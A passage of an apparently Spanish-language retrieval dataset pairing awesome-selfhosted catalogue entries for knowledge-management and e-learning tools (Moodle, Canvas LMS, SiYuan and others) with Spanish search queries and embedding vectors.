-0.13514, 0.00851, 0.00218, -0.06344, -0.03907, -0.05388, -0.02136, 0.09931, 0.03525, -0.0454, 0.00552, 0.03911, 0.01657, 0.0437, 0.02797, 0.07137, -0.02974, -0.014, -0.00054, -0.08392, 0.03165, 0.06133, -0.05215, 0.01488, 0.06535, 0.06187, -0.06826, -0.03182, 0.05148, 0.16363, -0.04678, 0.03679, 0.01841, 0.09922, 0.01543, 0.07557, 0.07307, -0.03508, 0.09158, -0.02757, 0.00475, 0.03217, 0.02257, 0.03831, -0.08307, 0.01025, -0.02217, -0.12832, 0.00321, 0.02865, -0.11033, 0.02534, -0.03959, 0.00616, 0.0564, -0.07017, 0.03074, -0.01232, 0.03776, 0.08883, -0.07924, 0.00065, -0.0688, -0.01256, 0.0736, -0.03786, 0.01364, 0.01239, -0.11255, -0.12555, 0.04937, -0.02949, 0.06824, -0.09024, 0.01395, -0.04177, 0.01142, -0.06324, 0.04379, -0.05408, 0.0283, -0.07907, -0.04147, 0.05765, -0.05198, 0.06982, -0.06879, 0.0371, 0.00544, -0.00818, -0.01387, 0.06452, 0.1028, -0.0214, -0.05303, 0.042, 0.04385, -0.04856, -0.03634, -0.03944, -0.04458, 0.08949, -0.06993, 0.00992, -0.02672, -0.06579, 0.08437, -0.01906, 0.0007, -0.04038, 0.0156, 0.00388, 0.02041, -0.01001, -0.02027, 0.00533, -0.01377, -0.05196, -0.04215, 0.01443, 0.00501, 0.07656, -0.04345, -0.06455, -0.08295, -0.0239, 0.03106, -0.11531, 0.00102, -0.08721, -0.01417, 0.0316, -0.04963, 0.04804, -0.04959, -0.02286, 0.01137, -0.02675, -0.03691, 0.1011, 0.05735, 0.00855, 0.08579, -0.07563, 0.01447, -0.02641, 0.02802, 0.02741, 0.04446, -0.01716, 0.00429, -0.00431, 0.02919, -0.00149, 0.06246, -0.00647, -0.01035, 0.03833, -0.02801, 0.0747, 0.02985, 0.01492, -0.00406, -3e-05, -0.00405, -0.01776, -0.02685, 0.00191, 0.047, 0.03607, -0.02394, -0.00882, 0.026, 0.05841, -0.00483, -0.02236, -0.06997, -0.00898, -0.07744, 0.01173, -0.0075, 0.02859, -0.03324, 0.05442, 0.03642, -0.01846, 0.02689, 0.03188]} -{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode [AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "cual es una herramienta para dibujar mapas mentales que funcione en mi servidor local?", "v": [0.18325, 0.07046, -0.1731, -0.08516, -0.0197, -0.13362, -0.12696, 0.00418, -0.0907, -0.08147, 0.04695, -0.00344, 0.05153, -0.0788, 0.01683, 0.02165, 0.21853, -0.06958, 0.0027, -0.02844, 0.00697, 0.04771, -0.03645, 0.06345, -0.06259, -0.07917, 0.08582, -0.0601, -0.20776, 0.03204, 0.04703, 0.07823, 0.08576, -0.08513, -0.01685, -0.13252, -0.01138, 0.02966, -0.07313, -0.02897, -0.00227, 0.06559, -0.10776, 0.08906, -0.09729, -0.02056, 0.02441, -0.06738, 0.0297, 0.11894, -0.06821, -0.08366, -0.07434, 0.03442, -0.00897, -0.0767, 0.16082, -0.13995, 0.11966, -0.05587, -0.12318, -0.02974, -0.07462, -0.1031, 0.05481, -0.03384, 0.07222, -0.05411, -0.07177, 0.04066, -0.07902, 0.11797, 0.02132, -0.08983, 0.0741, 0.00824, -0.05171, -0.04703, 0.12152, 0.01396, 0.04232, -0.02111, -0.06666, 0.07633, -0.0963, -0.08841, 0.00132, -0.07214, 0.02892, -0.04094, -0.03553, 0.03176, -0.01097, 0.09552, -0.05993, 0.02542, 0.08039, 0.04223, 0.0085, -0.01018, 0.07941, -0.03691, -0.15837, 0.01476, -0.03395, -0.01247, 0.04071, -0.00838, -0.03433, 0.0713, 0.11217, 0.03623, -0.00577, 0.04872, -0.04493, -0.02111, -0.01787, 0.06798, 0.03538, -0.01633, -0.02901, 0.02294, 0.05662, -0.02676, 0.02906, -0.00413, -0.03924, 0.01712, 0.02014, -0.02963, -0.03441, -0.00671, -0.09124, -0.01851, -0.05415, 0.06152, 0.05228, -0.07126, 0.02461, -0.02257, 0.01791, 0.01159, 0.02459, -0.04601, -0.00837, 0.06253, 0.0468, -0.05632, -0.08395, 0.04907, 0.01129, -0.03967, 0.07071, 0.02728, -0.03248, 0.00828, -0.01957, -0.03391, -0.07967, 0.0753, 0.01094, 0.02658, 0.12586, 0.10385, -0.01672, -0.11993, -0.06053, 0.04415, 0.09549, 0.07705, -0.02538, -0.05488, 0.03243, -0.01879, 0.0443, -0.07343, -0.10524, 0.00434, 0.04639, 0.00021, -0.04018, 0.03287, 0.04369, 0.00618, -0.06629, -0.01653, 0.01272, 0.02634, 0.03612, -0.05304, -0.04383, -0.00856, -0.02639, 0.0072, 0.05896, -0.02701, 0.04858, -0.00123, -0.04279, -0.05208, 3e-05, -0.02606, -0.05153, -0.0043, -0.02408, 0.09121, -0.0129, 0.02789, 0.00308, 0.06108, -0.03403, -0.03907, 0.06607, -0.05971, 0.03373, 0.01613, -0.00268, -0.0936, 0.01606, -0.02856, 0.01803, 0.02261, 0.02036, 0.00721, 0.00289, 0.07099, 0.04563, 0.04732, 0.04944, 0.0458, 0.02081, 0.0293, -0.02484, -0.0229, 0.02564, -0.02614, 0.06008, -0.04276, -0.04865, -0.10465, 0.04052, 0.0817, -0.00807, -0.05993, -0.00259, -0.08123, -0.02608, -0.05944, 0.00612, -0.06004, -0.00073, -0.00367, 0.10283, -0.00369, 0.06254, -0.01542]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "que programa es una plataforma de gestiΓ³n del aprendizaje libre para crear cursos en lΓ­nea", "v": [-0.02765, 0.06231, -0.09919, -0.27643, 0.01245, -0.13751, -0.01852, 0.01111, -0.14134, -0.12439, -0.11675, -0.07938, -0.01132, -0.05381, 0.00358, 0.01508, 0.031, -0.0992, 0.02722, 0.03941, -0.09315, 0.03344, -0.04345, -0.04904, -0.02881, -0.09353, 0.06913, -0.1546, -0.00689, 0.06438, -0.03452, 0.07393, 0.07388, -0.03334, 0.02938, -0.06277, 0.00396, 0.09333, -0.00721, 0.05754, -0.06029, 0.06111, -0.01121, 0.06559, 0.06157, -0.03628, 0.10479, 0.01675, 0.0458, 0.00634, 0.00388, 0.0225, -0.0283, 0.01081, 0.06786, -0.06694, 0.01199, -0.16254, 0.03029, -0.00917, -0.10388, -0.04378, 0.03437, -0.07382, 0.02208, 0.00641, 0.10823, 0.09673, -0.13079, 0.18372, 0.07695, -0.0889, -0.00382, -0.03608, 0.01121, 0.02456, -0.0063, -0.00154, -0.00126, -0.11531, 0.05056, -0.03722, -0.03103, 0.05899, -0.05491, 0.02988, -0.03794, -0.04459, 0.0331, -0.00744, -0.05057, 0.08435, -0.05473, -0.0171, 0.00225, -0.09086, 0.04799, -0.06207, 0.02256, -0.0021, -0.0598, 0.01347, -0.05621, 0.03942, -0.08944, 0.13563, 0.06604, -0.04536, -0.09793, 0.09783, 0.05649, -0.02098, 0.01021, -0.01628, -0.05359, -0.00591, 0.0132, 0.05066, 0.06094, -0.04078, 0.00366, 0.01449, -0.01023, -0.09413, 0.12879, 0.0571, -0.02577, 0.1129, -0.00582, 0.05453, -0.00496, -0.02953, -0.07174, -0.0545, -0.02233, -0.05398, 0.01671, 0.06896, -0.06025, -0.13306, -0.0415, 0.09337, -0.02711, -0.01461, -0.00416, -0.09291, 0.06153, -0.16308, -0.00191, 0.06702, -0.09075, 0.00938, -0.00038, 0.06566, -0.11744, -0.06095, 0.00479, -0.04889, -0.10544, 0.04802, -0.02595, 0.04602, 0.02696, -0.02844, 0.03757, -0.00831, -0.05543, 0.10001, 0.01056, 0.04624, -0.00627, 0.11845, 0.07967, -0.10487, 0.02018, -0.06467, -0.03584, -0.10242, 0.00809, -0.04698, -0.09068, -0.03756, -0.00945, -0.01155, -0.04, -0.06528, -0.00878, 0.02169, -0.00735, 0.06897, -0.05644, -0.00981, -0.11086, -0.03604, 0.02191, 0.01545, -0.03183, 0.02636, 0.06953, -0.06454, -0.09482, 0.03314, 0.03767, -0.04683, -0.02112, 0.05562, 0.0073, -0.00389, 0.03162, 0.06642, 0.01399, -0.03305, 0.09207, -0.05603, -0.00284, -0.04373, 0.02481, -0.01616, 0.06153, 0.00704, 0.004, 0.0418, -0.03341, 0.06323, -0.00134, -0.02188, -0.00975, 0.05865, 0.0166, 0.03395, 0.02142, -0.09089, -0.01284, -0.05387, 0.05079, -0.05056, 0.03439, 0.04393, -0.05328, -0.02065, -0.02065, 0.09775, -0.01733, -0.06317, 0.01751, -0.05929, -0.04515, -0.00345, -0.00236, -0.06471, -0.07341, -0.02214, 0.07384, 0.01061, -0.03449, 0.03147]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "con quΓ© herramienta puedo montar un campus virtual o un sistema educativo online sin pagar licencias", "v": [0.06064, 0.00245, -0.18484, -0.21938, -0.06981, -0.15312, -0.06419, -0.04764, -0.08359, -0.15962, -0.00366, -0.15739, 0.08212, -0.04292, 0.10561, 0.07587, 0.12331, -0.1747, 0.07111, 0.01644, -0.02957, -0.04008, -0.04181, -0.04914, -0.02283, 0.05828, -0.02179, -0.12058, -0.09848, 0.14041, -0.00165, 0.15262, 0.08842, -0.06029, -0.0435, -0.03777, 0.00304, 0.14429, 0.04608, 0.01105, 0.04654, 0.12751, -0.04354, -0.00494, 0.00367, -0.09683, 0.03936, -0.02465, -0.00562, -0.05816, -0.02278, -0.06263, -0.12514, -0.09095, 0.08596, -0.09878, 0.13017, -0.0954, 0.10079, -0.0861, -0.08996, 0.04261, -0.01709, -4e-05, 0.01163, 0.05169, 0.09798, 0.03782, -0.13273, 0.06993, 0.02581, -0.14118, 0.04493, 0.01787, -0.12347, 0.04758, -0.0289, -0.07192, 0.10491, 0.01566, 0.05037, 0.022, -0.04887, 0.06825, 0.00475, -0.04235, -0.04406, -0.01926, 0.09971, 0.00941, -0.01034, 0.17996, -0.05078, 0.04332, 0.07167, -0.12019, 0.06316, 0.01773, -0.07758, -0.02291, -0.08189, 0.08381, -0.09378, 0.03111, -0.06733, -0.00243, 0.01226, -0.03759, -0.02404, 0.01171, 0.07161, 0.05595, -0.06218, 0.06326, 0.02208, 0.04703, 0.03995, 0.07678, -0.00097, -0.00883, 0.03595, 0.0914, 0.05723, -0.08032, 0.07788, 0.0628, 0.0347, 0.10721, -0.03259, -0.06244, -0.02717, -0.09625, -0.00487, -0.02058, -0.00296, -0.01816, -0.01877, -0.06787, -0.06256, -0.0364, 0.01259, 0.06096, -0.00473, -0.06986, 0.00333, -0.00511, -0.00102, -0.06644, -0.09586, -0.06887, -0.00678, 0.02272, -0.01843, -0.00587, -0.10713, 0.02816, -0.04705, -0.00948, -0.01694, 0.03173, 0.07286, 0.02627, 0.047, -0.02057, -0.00079, 0.004, -0.02194, 0.02155, 0.0217, 0.08616, 0.01144, 0.00901, 0.05266, -0.01251, 0.02187, -0.01308, -0.02918, -0.06489, 0.00311, -0.01678, -0.05646, -0.00041, -0.0365, -0.04341, 0.01736, 0.04205, 0.00598, 0.03886, -0.02146, 0.06103, 0.00313, 0.01716, -0.04046, -0.02511, 0.0813, -0.01161, -0.05736, -0.02811, 0.05939, -0.01131, -0.02812, 0.00985, -0.02603, -0.05861, 0.00112, -0.0225, 0.03652, 0.03939, -0.01367, 0.04219, -0.01654, -0.02815, 0.00687, -0.06349, -0.01857, -0.00653, -0.0196, -0.01836, -0.06035, -0.04909, 0.05132, -0.02242, 0.00469, 0.06507, 0.03105, 0.03704, -0.00229, 0.0596, -0.02755, -0.06177, 0.00899, -0.03991, -0.01668, -0.02128, -0.00256, -0.05933, 0.02811, 0.05134, -0.08612, 0.02126, 0.01287, 0.04335, 0.05283, -0.024, -0.03559, -0.03639, -0.03623, -0.02513, -0.0237, -0.07812, -0.05525, 0.00232, 0.02903, 0.02294, -0.05232, 0.03113]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: Canvas LMS β€” Learning management system (LMS) that is revolutionizing the way we educate [AGPL-3.0, Ruby]. Chamilo LMS β€” Create a virtual campus for the provision of online or semi-online training [GPL-3.0, PHP]. Digiscreen β€” Interactive whiteboard/wallpaper for the classroom, in person or remotely (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digitools β€” A set of simple tools to accompany the animation of courses in person or remotely. (documentation in French) [AGPL-3.0, PHP]. edX β€” The Open edX platform is open-source code that powers edX.org [AGPL-3.0, Python]. Gibbon β€” Flexible school management platform designed to make life better for teachers, students, parents and leaders [GPL-3.0, PHP]. Helium β€” Color-coded student planner for classes, homework, grades, and notes with smart notifications and multi-device sync [MIT, Python/Docker]. ILIAS β€” Learning management system that can cope with anything you throw at it [GPL-3.0, PHP].", "indexar": "cual es una alternativa gratuita a los sistemas de gestiΓ³n educativa comerciales", "v": [-0.06155, 0.01923, -0.0723, -0.17425, 0.00594, -0.04843, 0.00243, 0.01571, -0.23611, -0.10148, -0.12981, -0.0649, 0.03178, -0.0283, 0.13376, -0.00519, 0.14981, -0.14882, 0.09762, -0.02419, -0.01985, -0.06622, -0.04589, 0.01023, -0.05646, 0.01085, -0.07025, -0.12795, 0.00949, 0.19108, 0.0939, 0.08663, 0.06766, -0.14365, -0.07459, 0.05643, 0.00564, 0.0375, 0.00818, -0.0685, 0.08205, -0.00941, -0.04805, -0.02639, 0.04749, 0.00153, 0.04876, 0.07301, -0.1072, -0.05719, -0.04546, 0.00422, -0.07036, -0.05383, 0.1683, -0.01887, -0.00829, 0.00572, -0.04185, -0.06732, 0.03706, 0.04437, 0.06125, -0.01589, 0.12372, -0.01191, 0.03377, -0.08358, -0.09144, 0.09002, 0.09355, -0.05607, 0.02831, 0.00771, -0.00243, 0.07866, 0.03895, 0.11174, 0.00971, 0.01686, 0.0872, -0.06431, -0.06567, 0.11927, -0.02322, -0.0471, -0.07789, -0.06794, 0.02375, -0.01896, -0.01013, 0.03829, -0.09904, 0.0026, 0.03572, -0.05063, 0.02014, -0.04238, -0.03876, 0.13214, -0.00426, 0.02017, -0.13482, 0.01673, -0.04557, 0.03631, -0.01098, -0.0488, 0.0074, -0.0277, -0.02696, -0.0143, 0.03448, 0.01382, -0.0039, 0.00726, -0.03256, -0.0037, -0.07605, -0.0208, -0.11819, 0.01973, 0.03393, -0.03287, 0.07856, 0.1016, 0.07189, 0.01282, 0.03447, 0.07639, 0.01957, -0.04806, -0.00505, -0.05079, -0.03649, -0.05973, 0.02897, -0.01868, 0.00853, -0.01252, -0.01811, 0.05754, 0.06262, -0.01907, 0.02348, -0.03581, 0.0886, -0.09056, 0.03048, -0.03705, -0.0589, -0.01112, 0.001, 0.0769, -0.03464, 0.04647, -0.01185, -0.02364, -0.05666, 0.06736, 0.05708, 0.01194, 0.00263, 0.0511, -0.03677, -0.06507, -0.06371, -5e-05, -0.01424, 0.01024, 0.00691, 0.10931, -0.00295, -0.03443, 0.01863, -0.09127, -0.044, -0.11285, 0.06932, -0.07451, -0.07197, -0.03792, -0.09114, 0.00145, -0.06361, -0.06395, -0.08534, 0.01269, 0.01531, 0.06306, 0.0118, 0.02069, -0.13054, -0.08472, -0.02946, -0.04594, -0.01873, -0.11599, -0.03174, 0.00018, -0.09062, 0.02793, 0.01303, -0.09254, -0.0205, 0.01804, 0.05255, 0.09304, 0.00904, 0.06456, -0.00836, 0.0263, 0.05458, -0.07704, -0.03704, -0.01463, 0.01837, -0.04227, 0.033, -0.04104, 0.01196, 0.02727, 0.06223, -0.00432, 0.0205, 0.00142, 0.01929, 0.10986, -0.00472, 0.00079, -0.01773, -0.00417, 0.03123, 0.00754, 0.02445, 0.00135, 0.03412, -0.02339, -0.01365, -0.04678, 0.10273, 0.1142, -0.06308, -0.03702, -0.04056, -0.09296, -0.09003, 0.0114, 0.02207, -0.14089, -0.02949, 0.03445, 0.01161, -0.01417, 0.05771, -0.02533]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "que programa puedo usar para crear un curso online seguro y automatizado?", "v": [0.04956, 0.01177, -0.20878, -0.13504, -0.00288, -0.11065, -0.027, -0.04118, -0.17657, -0.10964, -0.11961, -0.10416, -0.00229, -0.04047, -0.04002, -0.05987, 0.08186, -0.11906, 0.0523, 0.1605, 0.08997, -0.06518, -0.04209, -0.09966, -0.06814, -0.00895, 0.06516, -0.10217, -0.05479, 0.04791, -0.00268, 0.15315, 0.1186, -0.05816, 0.04364, -0.06779, 0.02109, 0.07648, 0.01594, 0.10807, -0.00517, 0.06911, -0.06771, 0.06733, 0.0589, 0.05249, 0.10909, -0.07496, 0.0083, -0.06717, 0.04715, -0.043, -0.08911, -0.07993, 0.08083, -0.08908, 0.05617, -0.17432, 0.0052, -0.06632, -0.02432, -0.02039, 0.00073, 0.05159, -0.01602, -0.07248, 0.15458, 0.01948, -0.12355, 0.10257, 0.01028, -0.07777, -0.00099, -0.02052, 0.00907, 0.00911, -0.05892, 0.02623, 0.05365, -0.06692, -0.08261, 0.02919, 0.07785, 0.02386, -0.12416, -0.0298, 0.00873, 0.01792, 0.02543, -0.01997, -0.02444, 0.07934, 0.00963, 0.03652, 0.00841, -0.07267, 0.08894, -0.06209, -0.00242, -0.00838, -0.00082, -0.03079, 0.00933, 0.09162, -0.03039, 0.02608, 0.09374, 0.05358, -0.00354, 0.0109, 0.03455, 0.03556, -0.07604, -0.05222, 0.00389, 0.05681, 0.02507, 0.05982, 0.03993, -0.06432, 0.01026, 0.10199, -0.03692, -0.02527, 0.1493, 0.01519, 0.00602, 0.1517, -0.1392, 0.02921, -0.06411, -0.00638, -0.10502, -0.13961, -0.02209, -0.01806, -0.04877, -0.05114, -0.03347, -0.04669, -0.02959, 0.1009, -0.08241, -0.02979, -0.01407, -0.03284, 0.01669, -0.10156, -0.01472, 0.06894, -0.04948, 0.04426, -0.02877, 0.0689, -0.07426, 0.01541, -0.01072, -0.06589, -0.01213, 0.05772, -0.05382, 0.02959, 0.07683, -0.07495, 0.06114, -0.01523, -0.01831, 0.01685, 0.02039, 0.0483, 0.04136, 0.09477, 0.07363, -0.04829, -0.00067, -0.025, -0.04053, -0.07063, -0.02557, -0.04302, -0.04786, -0.018, -0.01275, -0.00151, -0.00154, -0.02829, 0.02044, 0.02148, -0.01356, 0.0505, -0.08318, 0.01865, -0.09977, 0.06335, -0.01285, 0.0112, -0.01685, -0.04645, 0.05174, -0.06733, -0.05486, -0.00913, 0.01218, -0.05083, 0.01179, 0.06582, -0.01771, 0.01162, 0.04073, 0.11431, -0.01886, -0.08347, 0.07113, -0.05558, 0.00213, -0.0124, -0.00891, 0.01001, 0.01189, 0.00629, 0.03247, -0.04382, -0.01928, 0.09762, 0.04102, -0.05323, 0.01114, 0.00793, 0.02699, 0.02014, -0.01052, -0.0787, -0.0113, -0.0439, 0.02282, 0.00738, 0.06105, 0.01188, -0.06316, -0.02699, -0.0304, 0.10404, 0.02245, -0.04494, -0.03732, -0.0354, -0.09031, 0.05036, -0.03316, -0.02813, -0.06981, -0.01339, 0.02247, 0.00982, 0.00409, 0.05861]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Moodle o Open eClass para gestionar clases?", "v": [-0.09551, 0.10577, -0.02384, -0.10611, -0.16128, -0.07352, -0.04978, 0.0468, -0.1087, -0.11903, -0.09976, -0.23756, 0.0159, 0.04603, 0.05789, -0.01835, 0.16, -0.12775, -0.09769, 0.02617, -0.19079, -0.02498, -0.12497, -0.04454, 0.05898, 0.01504, 0.0283, -0.03097, 0.01463, -0.00319, -0.05573, 0.00204, 0.03785, -0.09607, 0.07119, 0.07512, 0.03701, 0.06781, -0.08044, -0.05656, -0.04012, 0.00104, -0.071, 0.10573, 0.1164, -0.02375, 0.04731, 0.1647, -0.05434, 0.03841, -0.07668, -0.02853, -0.01498, 0.02531, 0.12516, 0.07681, -0.0101, 0.00496, -0.11278, 0.02054, -0.01662, 0.06491, -0.01376, 0.02035, 0.09304, -0.06636, 0.09343, 0.12011, -0.13358, 0.09931, 0.00951, -0.09535, -0.06585, 0.00851, -0.04739, 0.05135, -0.05271, 0.0511, 0.02646, 0.06693, 0.05031, -0.05694, -0.07496, 0.06912, 0.02588, -0.02499, 0.01896, -0.09394, -0.00511, 0.02042, 0.0267, 0.05805, -0.11074, 0.03634, -0.00762, -0.08881, 0.03013, 0.01122, 0.0137, 0.00925, 7e-05, 0.06913, -0.03109, 0.02268, -0.06696, 0.05476, -0.01271, -0.0274, -0.01673, 0.06426, -0.00759, 0.04211, 0.0246, 0.05104, 0.02427, -0.01747, -0.0746, 0.03255, 0.02684, 0.04678, -0.00716, -0.06578, -0.00103, -0.07404, 0.07037, 0.1062, 0.08867, -0.03169, -0.02458, 0.10421, -0.05092, 0.00048, 0.02403, -0.04624, -0.02628, -0.04758, 0.0854, -0.02624, -0.0061, -0.07607, -0.07055, 0.10634, 0.10777, -0.03111, 0.04887, -0.13137, 0.0447, -0.05348, 0.00719, -0.03834, -0.11905, -0.00906, 0.04062, 0.0865, -0.06609, 0.02646, -0.04615, -0.04718, -0.06817, 0.07291, -0.00909, -0.00422, 0.00855, 0.01456, 0.00742, 0.00458, -0.01281, 0.06759, -0.10234, -0.01101, 0.0623, 0.05847, 0.02531, 0.06767, 0.03084, -0.06237, 0.04184, -0.17048, 0.04679, -0.00663, 0.05084, -0.01677, -0.02817, -0.00966, -0.03346, -0.00894, -0.04211, 0.02978, -0.05773, 0.06154, -0.03987, 0.01853, -0.09252, -0.11549, 0.00951, 0.01878, -0.00939, -0.09185, -0.05049, -0.01679, -0.04816, -0.00037, -0.05458, -0.05159, -0.00134, 0.02575, -0.0108, 0.07827, -0.00819, 0.04912, 0.02062, 0.01333, 0.11995, 0.01175, 0.00995, 0.03211, -0.04887, -0.03425, 0.03052, -0.03965, -0.00298, 0.00716, 0.05262, -0.01361, 0.00628, 0.01267, -0.0032, 0.04402, -0.00893, 0.0386, -0.01671, 0.02171, 0.02899, 0.0498, 0.02543, -0.0261, 0.05448, 0.00166, 0.02164, 0.00095, 0.07428, 0.0765, -8e-05, -0.00586, -0.03406, -0.03705, -0.12394, 0.03788, -0.00765, -0.07063, -0.07203, 0.05161, 0.04681, 0.03748, -0.00867, -0.02772]} -{"tipo": "pregunta", "herramienta": "Learning and Courses", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Learning and Courses", "tema": "learning and courses", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Learning and Courses: INGInious β€” Intelligent grader that allows secured and automated testing of code made by students [AGPL-3.0, Python/Docker]. Moodle β€” Learning and courses platform with one of the largest open source communities worldwide [GPL-3.0, PHP]. Open eClass β€” Open eClass is an advanced e-learning solution that can enhance the teaching and learning process [GPL-2.0, PHP]. OpenOLAT β€” Learning management system for teaching, education, assessment and communication [Apache-2.0, Java]. QST β€” Online assessment software. From a quick quiz on your phone to large scale, high stakes, proctored desktop testing, easy, secure and economical [GPL-2.0, Perl]. RELATE β€” Courseware package that includes features such as: flexible rules, statistics, multi-course support, class calendar [MIT, Python]. RosarioSIS β€” Student Information System for school management. Features students demographics, grades, scheduling, attendance, student billing, discipline & food service modules [GPL-2.0, PHP].", "indexar": "con que herramienta puedo evaluar automΓ‘ticamente el cΓ³digo de mis alumnos?", "v": [0.04623, 0.11915, -0.10021, -0.1588, -0.0187, -0.14375, -0.05843, 0.02926, -0.12466, -0.18744, -0.05781, -0.11823, 0.05093, -0.08448, 0.09451, 0.06421, 0.18491, -0.12567, 0.0035, 0.04797, 0.04552, -0.08573, -0.11241, -0.03131, -0.0676, 0.04445, -0.07976, 0.05942, -0.08452, 0.03123, -0.00759, 0.04162, 0.06535, -0.09997, -0.09054, 0.03598, 0.04078, 0.15161, -0.10539, 0.12931, -0.00885, 0.14267, -0.06758, 0.02429, 0.09348, 0.00815, 0.02145, 0.13054, -0.04558, -0.00677, 0.00332, -0.10855, -0.02519, -0.08914, 0.03338, -0.08467, 0.20791, -0.04903, -0.02682, -0.09984, 0.05845, -0.02041, -0.04289, -0.04466, 0.06714, 0.02541, 0.18777, -0.00223, -0.08459, 0.14103, 0.06487, -0.02964, -0.00809, -0.04336, -0.05348, 0.08568, -0.04142, 0.00387, 0.08952, 0.01264, 0.01178, -0.0386, -0.05467, -0.00423, -0.04447, -0.10404, -0.01395, -0.05598, 0.08977, -0.08212, -0.03363, 0.06817, -0.00611, 0.03374, 0.02948, -0.00958, 0.06684, -0.05942, 0.00471, -0.01332, 0.1051, -0.11834, 0.04957, 0.06823, 0.07491, 